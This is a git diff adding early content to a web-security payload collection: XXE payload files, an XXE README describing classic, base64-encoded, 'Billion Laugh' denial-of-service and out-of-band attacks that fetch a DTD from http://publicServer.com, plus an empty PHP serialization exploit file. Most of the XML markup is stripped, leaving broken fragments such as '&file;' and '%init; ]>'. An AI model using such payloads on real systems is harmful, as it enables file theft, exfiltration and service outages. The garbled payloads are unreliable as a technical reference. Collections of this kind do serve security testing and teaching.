diff --git a/PHP_Serialization/PHP-Serialization-RCE-Exploit.php b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
new file mode 100755
index 00000000..af0aae44
--- /dev/null
+++ b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
@@ -0,0 +1,32 @@
+
diff --git a/README.md b/README.md
index 2e31ff90..094b93cc 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,18 @@
-/!\ Work in Progress : 1%
-
# PayloadsAllTheThings
A list of every usefull payloads and bypass for Web Application Security
+
+TODO:
+* XSS
+* Upload
+* Traversal Directory
+* Tar
+* SSRF
+* PHP Serialization
+* CSV Injection
+
+To improve:
+* RCE
+* SQL injection
+* XXE
+
+# /!\ Work in Progress : 1%
diff --git a/XXE/Classic XXE B64 Encoded.xml b/XXE/Classic XXE B64 Encoded.xml
new file mode 100755
index 00000000..bc4f01d7
--- /dev/null
+++ b/XXE/Classic XXE B64 Encoded.xml
@@ -0,0 +1 @@
+ %init; ]>
\ No newline at end of file
diff --git a/XXE/Classic XXE.xml b/XXE/Classic XXE.xml
new file mode 100755
index 00000000..02f0b27e
--- /dev/null
+++ b/XXE/Classic XXE.xml
@@ -0,0 +1,6 @@
+
+
+
+]>
+&file;
\ No newline at end of file
diff --git a/XXE/Deny Of Service - Billion Laugh Attack b/XXE/Deny Of Service - Billion Laugh Attack
new file mode 100755
index 00000000..e4f21996
--- /dev/null
+++ b/XXE/Deny Of Service - Billion Laugh Attack
@@ -0,0 +1,8 @@
+
+
+
+
+
+]>
+&a4;
\ No newline at end of file
diff --git a/XXE/README.md b/XXE/README.md
index c707ab4f..da29ba94 100644
--- a/XXE/README.md
+++ b/XXE/README.md
@@ -1,12 +1,48 @@
-# Title
-Lorem
+# XML External Entity
+An XML External Entity attack is a type of attack against an application that parses XML input
-## Vuln
+## Exploit
+Classic XXE
```
-Code
+
+
+
+]>
+&file;
```
+Classic XXE Base64 encoded
+```
+ %init; ]>
+```
+
+Deny Of Service - Billion Laugh Attack
+```
+
+
+
+
+
+]>
+&a4;
+```
+
+
+XXE OOB Attack (Yunusov, 2013)
+```
+
+
+&send;
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+
+">
+%all;
+```
+
+
## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
\ No newline at end of file
diff --git a/XXE/XXE OOB Attack (Yunusov, 2013).xml b/XXE/XXE OOB Attack (Yunusov, 2013).xml
new file mode 100755
index 00000000..d36bca6a
--- /dev/null
+++ b/XXE/XXE OOB Attack (Yunusov, 2013).xml
@@ -0,0 +1,9 @@
+XXE OOB Attack (Yunusov, 2013)
+
+
+&send;
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+
+">
+%all;
\ No newline at end of file